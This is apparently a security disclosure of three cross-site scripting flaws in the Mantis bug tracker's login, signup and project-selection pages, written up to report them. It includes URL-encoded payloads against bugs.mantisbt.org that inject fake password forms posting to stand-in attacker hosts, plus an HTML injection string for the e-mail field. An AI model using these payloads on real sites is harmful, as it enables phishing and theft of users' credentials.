Multiple Cross Site Scripting Vulnerabilities

1.- (RE-)LOGIN XSS VULNERABILITY

-The first vulnerability that I found is this : You can login in anonymously and, when you want to perform a privileged
action you need to re-login with any valid user. The previous URL is passed as the return parameter to the login_page.php script. This parameter is not correctly sanitized when showing/parsing and we can put any html/script code
that we want. To try the first vulnerability copy the following text and paste in the location bar of your favourite web
browser :

http://bugs.mantisbt.org/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform%20action=%22http://malicious.site.com/script.xxx%22%3EPlease%20type%20your%20password%20:%20%3Cinput%20type=%22password%22%20name=%22your_password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22Give%20me%20your%20password,%20please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E

2.- REGISTER NEW USER XSS VULNERABILITY

-The second XSS problem is in the script signup.php (for example, http://bugs.mantisbt.org/signup.php). This scripts registers
a new user. The problem is that the script's doesn't sanitize properly the passed e-mail when showing/parsing. Now, we have
the second XSS problem that I found. To test it, please follow these steps :

- Navigate to http://bugs.mantisbt.org/signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text : 

    <h1>hi</h1><br><br><br><br><br><br><br><br><br><br><br><br>

- The page will be show the simple "hi" message but we can create a simple web-form or insert any malicious script.

3.- SELECT PROJECT XSS VULNERABILITY

-I will no explicate the problem because is the same all times. Try the following URL please :

http://bugs.mantisbt.org/login_select_proj_page.php?ref=%3Cbr%3E%3Cform%20action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%3E%3Cinput%20type=submit%20%20value=%22login%22%20onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E